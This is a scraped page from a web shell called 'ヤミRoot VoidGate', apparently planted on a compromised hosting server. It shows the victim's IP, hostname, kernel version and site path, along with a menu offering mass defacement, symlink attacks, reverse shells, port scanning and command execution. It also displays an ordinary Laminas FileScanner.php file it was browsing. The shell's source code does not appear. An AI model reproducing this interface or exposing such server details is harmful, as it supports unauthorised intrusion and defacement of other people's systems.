ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
laminas
/
laminas-code
/
src
/
Scanner
/
Viewing: FileScanner.php
<?php /** * @see https://github.com/laminas/laminas-code for the canonical source repository * @copyright https://github.com/laminas/laminas-code/blob/master/COPYRIGHT.md * @license https://github.com/laminas/laminas-code/blob/master/LICENSE.md New BSD License */ namespace Laminas\Code\Scanner; use Laminas\Code\Annotation\AnnotationManager; use Laminas\Code\Exception; use function file_exists; use function file_get_contents; use function sprintf; use function token_get_all; class FileScanner extends TokenArrayScanner implements ScannerInterface { /** * @var string */ protected $file; /** * @param string $file * @param null|AnnotationManager $annotationManager * @throws Exception\InvalidArgumentException */ public function __construct($file, AnnotationManager $annotationManager = null) { $this->file = $file; if (! file_exists($file)) { throw new Exception\InvalidArgumentException(sprintf( 'File "%s" not found', $file )); } parent::__construct(token_get_all(file_get_contents($file)), $annotationManager); } /** * @return string */ public function getFile() { return $this->file; } }
Coded With 💗 by
0x6ick